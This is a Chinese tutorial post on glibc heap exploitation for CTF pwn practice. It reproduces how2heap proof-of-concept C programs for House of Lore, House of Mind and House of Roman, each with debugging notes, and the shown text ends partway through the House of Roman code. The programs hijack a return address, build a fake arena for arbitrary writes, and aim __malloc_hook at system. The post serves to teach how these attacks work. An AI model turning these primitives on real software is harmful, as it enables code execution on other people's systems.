深入理解Pwn_Heap及相关例题
2024-1-5 18:6:27 Author: 看雪学苑(查看原文) 阅读量:5 收藏


前言

ptmalloc2的管理方式,chunk结构和bins的模型,在Overview of GLIBC heap exploitation techniques(https://0x434b.dev/overview-of-glibc-heap-exploitation-techniques/)ctfwiki(https://ctf-wiki.org/pwn/linux/user-mode/heap/ptmalloc2/introduction/)以及一些博客(https://blog.csdn.net/Tokameine/article/details/119490052)已经讲解的非常清楚,本文记录自己的学习堆利用的过程。

主要更新glibc-2.23,2.27,2.31,2.35,2.37主流版本和相关例题,glibc-2.23后面更新一些变化和新的利用方式,这里不包含IO_FILE的内容,IO_FILE会单独做一个专题。建议看完glibc源码分析后再来看,当然直接看也无所谓。目前比赛的glibc版本基本都是这几个长期支持版本,期间版本就不写了,另外文中没有标记glibc版本的就是到目前位置依然适用的方法。我将我的部分文章做了一个合集,入门新手想看先凑合着看吧。

◆主要工具:
pwncli(https://github.com/RoderickChan/pwncli)
PwnGdb(https://github.com/scwuaptx/Pwngdb)
gdb配置参考(https://bbs.kanxue.com/thread-276203.htm)

◆我的主要操作环境
wsl-kali。配置参考我的
另一篇文章(https://bbs.kanxue.com/thread-278044.htm)
docker desktop镜像
ubuntu:16.04
ubuntu:18.04
ubuntu:20.04
ubuntu:22.04
编译时可以加-g来方便调试。
ida pro 7.7 + gdb调试。

◆我的.gdbinit文件

source ~/pwndbg/gdbinit.py
source ~/peda/peda.py
source ~/Pwngdb/pwngdb.py
source ~/Pwngdb/angelheap/gdbinit.py

define hook-run
python
import angelheap
angelheap.init_angelheap()
end
end

#set context-clear-screen on
#set debug-events off

#source /root/splitmind/gdbinit.py
#python

#sections = "regs"

#mode = input("source/disasm/mixed mode:?(s/d/m)") or "d"

#import splitmind

#spliter = splitmind.Mind()
#spliter.select("main").right(display="regs", size="50%")
#gdb.execute("set context-stack-lines 10")

#legend_on = "code"
#if mode == "d":
# legend_on = "disasm"
# sections += " disasm"
# spliter.select("main").above(display="disasm", size="70%", banner="none")
# gdb.execute("set context-code-lines 30")

#elif mode == "s":
# sections += " code"
# spliter.select("main").above(display="code", size="70%", banner="none")
# gdb.execute("set context-source-code-lines 30")

#else:
# sections += " disasm code"
# spliter.select("main").above(display="code", size="70%")
# spliter.select("code").below(display="disasm", size="40%")
# gdb.execute("set context-code-lines 8")
# gdb.execute("set context-source-code-lines 20")

#sections += " args stack backtrace expressions"
#spliter.show("legend", on=legend_on)
#spliter.show("stack", on="regs")
#spliter.show("backtrace", on="regs")
#spliter.show("args", on="regs")
#spliter.show("expressions", on="args")

#gdb.execute("set context-sections \"%s\"" % sections)
#gdb.execute("set show-retaddr-reg on")

#spliter.build()

#end


四部

源码

/*
Advanced exploitation of the House of Lore - Malloc Maleficarum.
This PoC take care also of the glibc hardening of smallbin corruption.

[ ... ]

else
{
bck = victim->bk;
if (__glibc_unlikely (bck->fd != victim)){

errstr = "malloc(): smallbin double linked list corrupted";
goto errout;
}

set_inuse_bit_at_offset (victim, nb);
bin->bk = bck;
bck->fd = bin;

[ ... ]

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <assert.h>

void jackpot(){ fprintf(stderr, "Nice jump d00d\n"); exit(0); }

int main(int argc, char * argv[]){

intptr_t* stack_buffer_1[4] = {0};
intptr_t* stack_buffer_2[3] = {0};

fprintf(stderr, "\nWelcome to the House of Lore\n");
fprintf(stderr, "This is a revisited version that bypass also the hardening check introduced by glibc malloc\n");
fprintf(stderr, "This is tested against Ubuntu 16.04.6 - 64bit - glibc-2.23\n\n");

fprintf(stderr, "Allocating the victim chunk\n");
intptr_t *victim = malloc(0x100);
fprintf(stderr, "Allocated the first small chunk on the heap at %p\n", victim);

// victim-WORD_SIZE because we need to remove the header size in order to have the absolute address of the chunk
intptr_t *victim_chunk = victim-2;

fprintf(stderr, "stack_buffer_1 at %p\n", (void*)stack_buffer_1);
fprintf(stderr, "stack_buffer_2 at %p\n", (void*)stack_buffer_2);

fprintf(stderr, "Create a fake chunk on the stack\n");
fprintf(stderr, "Set the fwd pointer to the victim_chunk in order to bypass the check of small bin corrupted"
"in second to the last malloc, which putting stack address on smallbin list\n");
stack_buffer_1[0] = 0;
stack_buffer_1[1] = 0;
stack_buffer_1[2] = victim_chunk;

fprintf(stderr, "Set the bk pointer to stack_buffer_2 and set the fwd pointer of stack_buffer_2 to point to stack_buffer_1 "
"in order to bypass the check of small bin corrupted in last malloc, which returning pointer to the fake "
"chunk on stack");
stack_buffer_1[3] = (intptr_t*)stack_buffer_2;
stack_buffer_2[2] = (intptr_t*)stack_buffer_1;

fprintf(stderr, "Allocating another large chunk in order to avoid consolidating the top chunk with"
"the small one during the free()\n");
void *p5 = malloc(1000);
fprintf(stderr, "Allocated the large chunk on the heap at %p\n", p5);

fprintf(stderr, "Freeing the chunk %p, it will be inserted in the unsorted bin\n", victim);
free((void*)victim);

fprintf(stderr, "\nIn the unsorted bin the victim's fwd and bk pointers are the unsorted bin's header address (libc addresses)\n");
fprintf(stderr, "victim->fwd: %p\n", (void *)victim[0]);
fprintf(stderr, "victim->bk: %p\n\n", (void *)victim[1]);

fprintf(stderr, "Now performing a malloc that can't be handled by the UnsortedBin, nor the small bin\n");
fprintf(stderr, "This means that the chunk %p will be inserted in front of the SmallBin\n", victim);

void *p2 = malloc(1200);
fprintf(stderr, "The chunk that can't be handled by the unsorted bin, nor the SmallBin has been allocated to %p\n", p2);

fprintf(stderr, "The victim chunk has been sorted and its fwd and bk pointers updated\n");
fprintf(stderr, "victim->fwd: %p\n", (void *)victim[0]);
fprintf(stderr, "victim->bk: %p\n\n", (void *)victim[1]);

//------------VULNERABILITY-----------

fprintf(stderr, "Now emulating a vulnerability that can overwrite the victim->bk pointer\n");

victim[1] = (intptr_t)stack_buffer_1; // victim->bk is pointing to stack

//------------------------------------

fprintf(stderr, "Now allocating a chunk with size equal to the first one freed\n");
fprintf(stderr, "This should return the overwritten victim chunk and set the bin->bk to the injected victim->bk pointer\n");

void *p3 = malloc(0x100);

fprintf(stderr, "This last malloc should trick the glibc malloc to return a chunk at the position injected in bin->bk\n");
char *p4 = malloc(0x100);
fprintf(stderr, "p4 = malloc(0x100)\n");

fprintf(stderr, "\nThe fwd pointer of stack_buffer_2 has changed after the last malloc to %p\n",
stack_buffer_2[2]);

fprintf(stderr, "\np4 is %p and should be on the stack!\n", p4); // this chunk will be allocated on stack
intptr_t sc = (intptr_t)jackpot; // Emulating our in-memory shellcode
long offset = (long)__builtin_frame_address(0) - (long)p4;
memcpy((p4+offset+8), &sc, 8); // This bypasses stack-smash detection since it jumps over the canary

// sanity check
assert((long)__builtin_return_address(0) == (long)jackpot);
}

调试



首先申请一个0x110大小的堆块,然后布置栈上两个stack_buffer结构,即stack1_fd->small_chunkstack1_bk->stack2_prevstack2_fd->stack1_prev



申请0x3f0大小的chunk隔离top_chunk,然后将0x111chunk放进unsorted_bin,申请(large_chunk)0x4c0大小的chunk触发consolidate机制再次将其再次放入small_bin中,并修改其bk->stack1_prev

此时:

FD:stack2_fd->stack1_prev;stack1_fd->small_chunk_fd;

BK:small_chunk_bk->stack1_prev;stack1_bk->stack2_prev;

// 第二种情况,small bin 中存在空闲的 chunk。
// 找到倒数第二个 chunk(small_chunk)->bk。
bck = victim->bk;
if (__glibc_unlikely(bck->fd != victim)) {
errstr = "malloc(): smallbin double linked list corrupted";
goto errout;
}
// 设置 victim 对应的 inuse 位
set_inuse_bit_at_offset(victim, nb);
// 修改 small bin 链表,将 small bin 的最后一个 chunk 取出来
bin->bk = bck;
bck->fd = bin;

然后再次申请两个用户区为0x100大小的chunk,第一次申请时绕过以上验证,此时bck(stack1)_fd->small_chunk。,第二次申请同理,要取出victim=stack1,此时stack_2_fd->stack_1_prev; stack1_bk->stack2_prev


然后申请两次0x110大小的chunk,分别为p3p4,会将small_chunkstack1取出来,然后覆盖main返回地址为目标函数地址即可完成任意地址写。

源码

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <stdint.h>
#include <assert.h>

/*

House of Mind - Fastbin Variant
==========================

This attack is similar to the original 'House of Mind' in that it uses
a fake non-main arena in order to write to a new location. This
uses the fastbin for a WRITE-WHERE primitive in the 'fastbin'
variant of the original attack though. The original write for this
can be found at https://dl.packetstormsecurity.net/papers/attack/MallocMaleficarum.txt with a more recent post (by me) at https://maxwelldulin.com/BlogPost?post=2257705984.

By being able to allocate an arbitrary amount of chunks, a single byte
overwrite on a chunk size and a memory leak, we can control a super
powerful primitive.

This could be used in order to write a freed pointer to an arbitrary
location (which seems more useful). Or, this could be used as a
write-large-value-WHERE primitive (similar to unsortedbin attack).
Both are interesting in their own right though but the first
option is the most powerful primitive, given the right setting.

Malloc chunks have a specified size and this size information
special metadata properties (prev_inuse, mmap chunk and non-main arena).
The usage of non-main arenas is the focus of this exploit. For more information
on this, read https://sploitfun.wordpress.com/2015/02/10/understanding-glibc-malloc/.

First, we need to understand HOW the non-main arena is known from a chunk.

This the 'heap_info' struct:

struct _heap_info
{
mstate ar_ptr; // Arena for this heap. <--- Malloc State pointer
struct _heap_info *prev; // Previous heap.
size_t size; // Current size in bytes.
size_t mprotect_size; // Size in bytes that has been mprotected
char pad[-6 * SIZE_SZ & MALLOC_ALIGN_MASK]; // Proper alignment
} heap_info;
- https://elixir.bootlin.com/glibc/glibc-2.23/source/malloc/arena.c#L48

The important thing to note is that the 'malloc_state' within
an arena is grabbed from the ar_ptr, which is the FIRST entry
of this. Malloc_state == mstate == arena

The main arena has a special pointer. However, non-main arenas (mstate)
are at the beginning of a heap section. They are grabbed with the
following code below, where the user controls the 'ptr' in 'arena_for_chunk':

#define heap_for_ptr(ptr) \
((heap_info *) ((unsigned long) (ptr) & ~(HEAP_MAX_SIZE - 1)))
#define arena_for_chunk(ptr) \
(chunk_non_main_arena (ptr) ? heap_for_ptr (ptr)->ar_ptr : &main_arena)
- https://elixir.bootlin.com/glibc/glibc-2.23/source/malloc/arena.c#L127

This macro takes the 'ptr' and subtracts a large value because the
'heap_info' should be at the beginning of this heap section. Then,
using this, it can find the 'arena' to use.

The idea behind the attack is to use a fake arena to write pointers
to locations where they should not go but abusing the 'arena_for_chunk'
functionality when freeing a fastbin chunk.

This POC does the following things:
- Finds a valid arena location for a non-main arena.
- Allocates enough heap chunks to get to the non-main arena location where
we can control the values of the arena data.
- Creates a fake 'heap_info' in order to specify the 'ar_ptr' to be used as the arena later.
- Using this fake arena (ar_ptr), we can use the fastbin to write
to an unexpected location of the 'ar_ptr' with a heap pointer.

Requirements:
- A heap leak in order to know where the fake 'heap_info' is located at.
- Could be possible to avoid with special spraying techniques
- An unlimited amount of allocations
- A single byte overflow on the size of a chunk
- NEEDS to be possible to put into the fastbin.
- So, either NO tcache or the tcache needs to be filled.
- The location of the malloc state(ar_ptr) needs to have a value larger
than the fastbin size being freed at malloc_state.system_mem otherwise
the chunk will be assumed to be invalid.
- This can be manually inserted or CAREFULLY done by lining up
values in a proper way.
- The NEXT chunk, from the one that is being freed, must be a valid size
(again, greater than 0x20 and less than malloc_state.system_mem)

Random perks:
- Can be done MULTIPLE times at the location, with different sized fastbin
chunks.
- Does not brick malloc, unlike the unsorted bin attack.
- Only has three requirements: Infinite allocations, single byte buffer overflowand a heap memory leak.

************************************
Written up by Maxwell Dulin (Strikeout)
************************************
*/

int main()
{
printf("House of Mind - Fastbin Variant\n");
puts("==================================");
printf("The goal of this technique is to create a fake arena\n");
printf("at an offset of HEAP_MAX_SIZE\n");

printf("Then, we write to the fastbins when the chunk is freed\n");
printf("This creates a somewhat constrained WRITE-WHERE primitive\n");
// Values for the allocation information.
int HEAP_MAX_SIZE = 0x4000000;
int MAX_SIZE = (128*1024) - 0x100; // MMap threshold: https://elixir.bootlin.com/glibc/glibc-2.23/source/malloc/malloc.c#L635

printf("Find initial location of the heap\n");
// The target location of our attack and the fake arena to use
uint8_t* fake_arena = malloc(0x1000);
uint8_t* target_loc = fake_arena + 0x28;

uint8_t* target_chunk = (uint8_t*) fake_arena - 0x10;

/*
Prepare a valid 'malloc_state' (arena) 'system_mem'
to store a fastbin. This is important because the size
of a chunk is validated for being too small or too large
via the 'system_mem' of the 'malloc_state'. This just needs
to be a value larger than our fastbin chunk.
*/
printf("Set 'system_mem' (offset 0x880) for fake arena\n");
fake_arena[0x880] = 0xFF;
fake_arena[0x881] = 0xFF;
fake_arena[0x882] = 0xFF;

printf("Target Memory Address for overwrite: %p\n", target_loc);
printf("Must set data at HEAP_MAX_SIZE (0x%x) offset\n", HEAP_MAX_SIZE);

// Calculate the location of our fake arena
uint64_t new_arena_value = (((uint64_t) target_chunk) + HEAP_MAX_SIZE) & ~(HEAP_MAX_SIZE - 1);
uint64_t* fake_heap_info = (uint64_t*) new_arena_value;

uint64_t* user_mem = malloc(MAX_SIZE);
printf("Fake Heap Info struct location: %p\n", fake_heap_info);
printf("Allocate until we reach a MAX_HEAP_SIZE offset\n");

/*
The fake arena must be at a particular offset on the heap.
So, we allocate a bunch of chunks until our next chunk
will be in the arena. This value was calculated above.
*/
while((long long)user_mem < new_arena_value){
user_mem = malloc(MAX_SIZE);
}

// Use this later to trigger craziness
printf("Create fastbin sized chunk to be victim of attack\n");
uint64_t* fastbin_chunk = malloc(0x50); // Size of 0x60
uint64_t* chunk_ptr = fastbin_chunk - 2; // Point to chunk instead of mem
printf("Fastbin Chunk to overwrite: %p\n", fastbin_chunk);

/*
Create a FAKE malloc_state pointer for the heap_state
This is the 'ar_ptr' of the 'heap_info' struct shown above.
This is the first entry in the 'heap_info' struct at offset 0x0
at the heap.

We set this to the location where we want to write a value to.
The location that gets written to depends on the fastbin chunk
size being freed. This will be between an offset of 0x8 and 0x40
bytes. For instance, a chunk with a size of 0x20 would be in the
0th index of fastbinsY struct. When this is written to, we will
write to an offset of 8 from the original value written.
- https://elixir.bootlin.com/glibc/glibc-2.23/source/malloc/malloc.c#L1686
*/
printf("Setting 'ar_ptr' (our fake arena) in heap_info struct to %p\n", fake_arena);
fake_heap_info[0] = (uint64_t) fake_arena; // Setting the fake ar_ptr (arena)
printf("Target Write at %p prior to exploitation: 0x%x\n", target_loc, *(target_loc));

/*
Set the non-main arena bit on the size.
Additionally, we keep the size the same as the original
allocation because there is a sanity check on the fastbin (when freeing)
that the next chunk has a valid size.

When grabbing the non-main arena, it will use our choosen arena!
From there, it will write to the fastbin because of the size of the
chunk.

///// Vulnerability! Overwriting the chunk size
*/
printf("Set non-main arena bit on the fastbin chunk\n");
puts("NOTE: This keeps the next chunk size valid because the actual chunk size was never changed\n");
chunk_ptr[1] = 0x60 | 0x4; // Setting the non-main arena bit

//// End vulnerability

/*
The offset being written to with the fastbin chunk address
depends on the fastbin BEING used and the malloc_state itself.
In 2.23, the offset from the beginning of the malloc_state
to the fastbinsY array is only 0x8. Then, fastbinsY[0x4] is an
additional byte offset of 0x20. In total, the writing offset
from the arena location is 0x28 bytes.
from the arena location to where the write actually occurs.
This is a similar concept to bk - 0x10 from the unsorted
bin attack.
*/
printf("When we free the fastbin chunk with the non-main arena bit\n");
printf("set, it will cause our fake 'heap_info' struct to be used.\n");
printf("This will dereference our fake arena location and write\n");
printf("the address of the heap to an offset of the arena pointer.\n");

printf("Trigger the magic by freeing the chunk!\n");
free(fastbin_chunk); // Trigger the madness

// For this particular fastbin chunk size, the offset is 0x28.
printf("Target Write at %p: 0x%llx\n", target_loc, *((unsigned long long*) (target_loc)));
assert(*((unsigned long *) (target_loc)) != 0);
}

基础知识

2.23版本和2.27以后间fastbinY[4]数组的偏移不同,2.230x382.27以后加入了have_fastchunks,需要向后偏移0x8字节,即偏移为0x402.23malloc_state_heap_info源码如下:

struct malloc_state
{
/* Serialize access. */
mutex_t mutex;

/* Flags (formerly in max_fast). */
int flags;

/* Fastbins */
mfastbinptr fastbinsY[NFASTBINS];

/* Base of the topmost chunk -- not otherwise kept in a bin */
mchunkptr top;

/* The remainder from the most recent split of a small request */
mchunkptr last_remainder;

/* Normal bins packed as described above */
mchunkptr bins[NBINS * 2 - 2];

/* Bitmap of bins */
unsigned int binmap[BINMAPSIZE];

/* Linked list */
struct malloc_state *next;

/* Linked list for free arenas. Access to this field is serialized
by free_list_lock in arena.c. */
struct malloc_state *next_free;

/* Number of threads attached to this arena. 0 if the arena is on
the free list. Access to this field is serialized by
free_list_lock in arena.c. */
INTERNAL_SIZE_T attached_threads;

/* Memory allocated from the system in this arena. */
INTERNAL_SIZE_T system_mem;
INTERNAL_SIZE_T max_system_mem;
};

typedef struct _heap_info
{
mstate ar_ptr; /* Arena for this heap. */
struct _heap_info *prev; /* Previous heap. */
size_t size; /* Current size in bytes. */
size_t mprotect_size; /* Size in bytes that has been mprotected
PROT_READ|PROT_WRITE. */
/* Make sure the following data is properly aligned, particularly
that sizeof (heap_info) + 2 * SIZE_SZ is a multiple of
MALLOC_ALIGNMENT. */
char pad[-6 * SIZE_SZ & MALLOC_ALIGN_MASK];
} heap_info;

调试

target_loc位置在fake_arena_chunk + 0x30处,也就是fake_arena_fastbinY[4]处,因为我们要申请的fast_chunk大小为0x60

system_mem标识这个arena管理的空间大小,请求的内存不能大于system_mem

在系统堆初始化之后,将堆的大小定为0x4000000,因此后面申请的假arena管理的地址在这个堆之后,要计算这个堆的起始地址,程序中这个地址为0x4000000MAX_SIZE大小为0x1ff00 < 0x20000也就不会触发mmap申请机制。

一直分配MAX_SIZE大小的chunk直到系统的main_heap被申请完。


在新的堆区申请0x60大小的fast_chunk

fake_heap_info[0]==ar_ptr -> fake_arenaar_ptr指针指向我们的fake_arenaar_ptr指针指向一个为该堆服务的arena

fastbin_chunk_size = 0x60 | 0x4(0100B)NON_MAIN_ARENA置为1,标明其不在主堆区。

free(fastbin_chunk_fd)后,将会把它链接到fake_heap_info_ar_ptr指向fake_arenafastbinY[4] (0x60)处,也就是0x603448处。

此时完成利用成功将目标地址内容写为fastbin_chunk_prev_addr

glibc < 2.29

编译选项:gcc -g house_of_roman.c -fpie -pie -ldl -o house_of_roman

除了libc-2.23.sold-2.23.so需要patch以外,还需要patch一下libdl-2.23.so

patchelf --replace-needed libdl.so.2 ./libdl-2.23.so house_of_roman

源码

#define _GNU_SOURCE /* for RTLD_NEXT */
#include <stdlib.h>
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <malloc.h>
#include <dlfcn.h>

char* shell = "/bin/sh\x00";

/*
Technique was tested on GLibC 2.23, 2.24 via the glibc_build.sh script inside of how2heap on Ubuntu 16.04. 2.25 was tested on Ubuntu 17.04.

Compile: gcc -fPIE -pie house_of_roman.c -o house_of_roman

POC written by Maxwell Dulin (Strikeout)
*/

// Use this in order to turn off printf buffering (messes with heap alignment)
void* init(){
setvbuf(stdout, NULL, _IONBF, 0);
setvbuf(stdin, NULL, _IONBF, 0);
}

int main(){

/*
The main goal of this technique is to create a **leakless** heap
exploitation technique in order to get a shell. This is mainly
done using **relative overwrites** in order to get pointers in
the proper locations without knowing the exact value of the pointer.

The first step is to get a pointer inside of __malloc_hook. This
is done by creating a fastbin bin that looks like the following:
ptr_to_chunk -> ptr_to_libc. Then, we alter the ptr_to_libc
(with a relative overwrite) to point to __malloc_hook.

The next step is to run an unsorted bin attack on the __malloc_hook
(which is now controllable from the previous attack). Again, we run
the unsorted_bin attack by altering the chunk->bk with a relative overwrite.

Finally, after launching the unsorted_bin attack to put a libc value
inside of __malloc_hook, we use another relative overwrite on the
value of __malloc_hook to point to a one_gadget, system or some other function.

Now, the next time we run malloc we pop a shell! :)
However, this does come at a cost: 12 bits of randomness must be
brute forced (0.02% chance) of working.

The original write up for the *House of Roman* can be found at
https://gist.github.com/romanking98/9aab2804832c0fb46615f025e8ffb0bc#assumptions.

This technique requires the ability to edit fastbin and unsorted bin
pointers via UAF or overflow of some kind. Additionally, good control
over the allocations sizes and freeing is required for this technique.
*/

char* introduction = "\nWelcome to the House of Roman\n\n"
"This is a heap exploitation technique that is LEAKLESS.\n"
"There are three stages to the attack: \n\n"
"1. Point a fastbin chunk to __malloc_hook.\n"
"2. Run the unsorted_bin attack on __malloc_hook.\n"
"3. Relative overwrite on main_arena at __malloc_hook.\n\n"
"All of the stuff mentioned above is done using two main concepts:\n"
"relative overwrites and heap feng shui.\n\n"
"However, this technique comes at a cost:\n"
"12-bits of entropy need to be brute forced.\n"
"That means this technique only work 1 out of every 4096 tries or 0.02%.\n"
"**NOTE**: For the purpose of this exploit, we set the random values in order to make this consisient\n\n\n";
puts(introduction);
init();

/*
Part 1: Fastbin Chunk points to __malloc_hook

Getting the main_arena in a fastbin chunk ordering is the first step.
This requires a ton of heap feng shui in order to line this up properly.
However, at a glance, it looks like the following:

First, we need to get a chunk that is in the fastbin with a pointer to
a heap chunk in the fd.
Second, we point this chunk to a pointer to LibC (in another heap chunk).
All of the setup below is in order to get the configuration mentioned
above setup to perform the relative overwrites. ";

Getting the pointer to libC can be done in two ways:
- A split from a chunk in the small/large/unsorted_bins
gets allocated to a size of 0x70.
- Overwrite the size of a small/large chunk used previously to 0x71.

For the sake of example, this uses the first option because it
requires less vulnerabilities.
*/

puts("Step 1: Point fastbin chunk to __malloc_hook\n\n");
puts("Setting up chunks for relative overwrites with heap feng shui.\n");

// Use this as the UAF chunk later to edit the heap pointer later to point to the LibC value.
uint8_t* fastbin_victim = malloc(0x60);

// Allocate this in order to have good alignment for relative
// offsets later (only want to overwrite a single byte to prevent
// 4 bits of brute on the heap).
malloc(0x80);

// Offset 0x100
uint8_t* main_arena_use = malloc(0x80);

// Offset 0x190
// This ptr will be used for a relative offset on the 'main_arena_use' chunk
uint8_t* relative_offset_heap = malloc(0x60);

// Free the chunk to put it into the unsorted_bin.
// This chunk will have a pointer to main_arena + 0x68 in both the fd and bk pointers.
free(main_arena_use);

/*
Get part of the unsorted_bin chunk (the one that we just freed).
We want this chunk because the fd and bk of this chunk will
contain main_arena ptrs (used for relative overwrite later).

The size is particularly set at 0x60 to put this into the 0x70 fastbin later.

This has to be the same size because the __malloc_hook fake
chunk (used later) uses the fastbin size of 0x7f. There is
a security check (within malloc) that the size of the chunk matches the fastbin size.
*/

puts("Allocate chunk that has a pointer to LibC main_arena inside of fd ptr.\n");
//Offset 0x100. Has main_arena + 0x68 in fd and bk.
uint8_t* fake_libc_chunk = malloc(0x60);

//// NOTE: This is NOT part of the exploit... \\\
// The __malloc_hook is calculated in order for the offsets to be found so that this exploit works on a handful of versions of GLibC.
long long __malloc_hook = ((long*)fake_libc_chunk)[0] - 0xe8;

// We need the filler because the overwrite below needs
// to have a ptr in the fd slot in order to work.
//Freeing this chunk puts a chunk in the fd slot of 'fastbin_victim' to be used later.
free(relative_offset_heap);

/*
Create a UAF on the chunk. Recall that the chunk that fastbin_victim
points to is currently at the offset 0x190 (heap_relative_offset).
*/
free(fastbin_victim);

/*

Now, we start doing the relative overwrites, since that we have
the pointers in their proper locations. The layout is very important to
understand for this.

Current heap layout:
0x0: fastbin_victim - size 0x70
0x70: alignment_filler - size 0x90
0x100: fake_libc_chunk - size 0x70
0x170: leftover_main - size 0x20
0x190: relative_offset_heap - size 0x70

bin layout:
fastbin: fastbin_victim -> relative_offset_heap
unsorted: leftover_main

Now, the relative overwriting begins:
Recall that fastbin_victim points to relative_offset_heap
(which is in the 0x100-0x200 offset range). The fastbin uses a singly
linked list, with the next chunk in the 'fd' slot.

By *partially* editing the fastbin_victim's last byte (from 0x90
to 0x00) we have moved the fd pointer of fastbin_victim to
fake_libc_chunk (at offset 0x100).

Also, recall that fake_libc_chunk had previously been in the unsorted_bin.
Because of this, it has a fd pointer that points to main_arena + 0x68.

Now, the fastbin looks like the following:
fastbin_victim -> fake_libc_chunk ->(main_arena + 0x68).

The relative overwrites (mentioned above) will be demonstrates step by step below.

*/

puts("\
Overwrite the first byte of a heap chunk in order to point the fastbin chunk\n\
to the chunk with the LibC address\n");
puts("\
Fastbin 0x70 now looks like this:\n\
heap_addr -> heap_addr2 -> LibC_main_arena\n");
fastbin_victim[0] = 0x00; // The location of this is at 0x100. But, we only want to overwrite the first byte. So, we put 0x0 for this.

/*
Now, we have a fastbin that looks like the following:
0x70: fastbin_victim -> fake_libc_chunk -> (main_arena + 0x68)

We want the fd ptr in fake_libc_chunk to point to something useful.
So, let's edit this to point to the location of the __malloc_hook.
This way, we can get control of a function ptr.

To do this, we need a valid malloc size. Within the __memalign_hook
is usually an address that usually starts with 0x7f.
Because __memalign_hook value is right before this are all 0s,
we could use a misaligned chunk to get this to work as a valid size in
the 0x70 fastbin.

This is where the first 4 bits of randomness come into play.
The first 12 bits of the LibC address are deterministic for the address.
However, the next 4 (for a total of 2 bytes) are not.

So, we have to brute force 2^4 different possibilities (16)
in order to get this in the correct location. This 'location'
is different for each version of GLibC (should be noted).

After doing this relative overwrite, the fastbin looks like the following:
0x70: fastbin_victim -> fake_libc_chunk -> (__malloc_hook - 0x23).

*/

/*
Relatively overwrite the main_arena pointer to point to a valid
chunk close to __malloc_hook.

///// NOTE: In order to make this exploit consistent
(not brute forcing with hardcoded offsets), we MANUALLY set the values. \\\

In the actual attack, this values would need to be specific
to a version and some of the bits would have to be brute forced
(depending on the bits).
*/

puts("\
Use a relative overwrite on the main_arena pointer in the fastbin.\n\
Point this close to __malloc_hook in order to create a fake fastbin chunk\n");
long long __malloc_hook_adjust = __malloc_hook - 0x23; // We substract 0x23 from the malloc because we want to use a 0x7f as a valid fastbin chunk size.

// The relative overwrite
int8_t byte1 = (__malloc_hook_adjust) & 0xff;
int8_t byte2 = (__malloc_hook_adjust & 0xff00) >> 8;
fake_libc_chunk[0] = byte1; // Least significant bytes of the address.
fake_libc_chunk[1] = byte2; // The upper most 4 bits of this must be brute forced in a real attack.

// Two filler chunks prior to the __malloc_hook chunk in the fastbin.
// These are fastbin_victim and fake_libc_chunk.
puts("Get the fake chunk pointing close to __malloc_hook\n");
puts("\
In a real exploit, this would fail 15/16 times\n\
because of the final half byet of the malloc_hook being random\n");
malloc(0x60);
malloc(0x60);

// If the 4 bit brute force did not work, this will crash because
// of the chunk size not matching the bin for the chunk.
// Otherwise, the next step of the attack can begin.
uint8_t* malloc_hook_chunk = malloc(0x60);

puts("Passed step 1 =)\n\n\n");

/*
Part 2: Unsorted_bin attack

Now, we have control over the location of the __malloc_hook.
However, we do not know the address of LibC still. So, we cannot
do much with this attack. In order to pop a shell, we need
to get an address at the location of the __malloc_hook.

We will use the unsorted_bin attack in order to change the value
of the __malloc_hook with the address of main_arena + 0x68.
For more information on the unsorted_bin attack, review
https://github.com/shellphish/how2heap/blob/master/glibc_2.26/unsorted_bin_attack.c.

For a brief overview, the unsorted_bin attack allows us to write
main_arena + 0x68 to any location by altering the chunk->bk of
an unsorted_bin chunk. We will choose to write this to the
location of __malloc_hook.

After we overwrite __malloc_hook with the main_arena, we will
edit the pointer (with a relative overwrite) to point to a
one_gadget for immediate code execution.

Again, this relative overwrite works well but requires an additional
1 byte (8 bits) of brute force.
This brings the chances of a successful attempt up to 12 bits of
randomness. This has about a 1/4096 or a 0.0244% chance of working.

The steps for phase two of the attack are explained as we go below.
*/

puts("\
Start Step 2: Unsorted_bin attack\n\n\
The unsorted bin attack gives us the ability to write a\n\
large value to ANY location. But, we do not control the value\n\
This value is always main_arena + 0x68. \n\
We point the unsorted_bin attack to __malloc_hook for a \n\
relative overwrite later.\n");

// Get the chunk to corrupt. Add another ptr in order to prevent consolidation upon freeing.

uint8_t* unsorted_bin_ptr = malloc(0x80);
malloc(0x30); // Don't want to consolidate

puts("Put chunk into unsorted_bin\n");
// Free the chunk to create the UAF
free(unsorted_bin_ptr);

/* /// NOTE: The last 4 bits of byte2 would have been brute forced earlier. \\\
However, for the sake of example, this has been calculated dynamically.
*/
__malloc_hook_adjust = __malloc_hook - 0x10; // This subtract 0x10 is needed because of the chunk->fd doing the actual overwrite on the unsorted_bin attack.
byte1 = (__malloc_hook_adjust) & 0xff;
byte2 = (__malloc_hook_adjust & 0xff00) >> 8;

// Use another relative offset to overwrite the ptr of the chunk->bk pointer.
// From the previous brute force (4 bits from before) we
// know where the location of this is at. It is 5 bytes away from __malloc_hook.
puts("Overwrite last two bytes of the chunk to point to __malloc_hook\n");
unsorted_bin_ptr[8] = byte1; // Byte 0 of bk.

// //// NOTE: Normally, the second half of the byte would HAVE to be brute forced. However, for the sake of example, we set this in order to make the exploit consistent. ///
unsorted_bin_ptr[9] = byte2; // Byte 1 of bk. The second 4 bits of this was brute forced earlier, the first 4 bits are static.

/*
Trigger the unsorted bin attack.
This will write the value of (main_arena + 0x68) to whatever is in the bk ptr + 0x10.

A few things do happen though:
- This makes the unsorted bin (hence, small and large too)
unusable. So, only allocations previously in the fastbin can only be used now.
- If the same size chunk (the unsorted_bin attack chunk)
is NOT malloc'ed, the program will crash immediately afterwards.
So, the allocation request must be the same as the unsorted_bin chunk.

The first point is totally fine (in this attack). But, in more complicated
programming, this can be an issue.
The second just requires us to do the same size allocaton as the current chunk.

*/

puts("Trigger the unsorted_bin attack\n");
malloc(0x80); // Trigger the unsorted_bin attack to overwrite __malloc_hook with main_arena + 0x68

long long system_addr = (long long)dlsym(RTLD_NEXT, "system");

puts("Passed step 2 =)\n\n\n");
/*
Step 3: Set __malloc_hook to system

The chunk itself is allocated 19 bytes away from __malloc_hook.
So, we use a realtive overwrite (again) in order to partially overwrite
the main_arena pointer (from unsorted_bin attack) to point to system.

In a real attack, the first 12 bits are static (per version).
But, after that, the next 12 bits must be brute forced.

/// NOTE: For the sake of example, we will be setting these values, instead of brute forcing them. \\\
*/

puts("Step 3: Set __malloc_hook to system/one_gadget\n\n");
puts("\
Now that we have a pointer to LibC inside of __malloc_hook (from step 2), \n\
we can use a relative overwrite to point this to system or a one_gadget.\n\
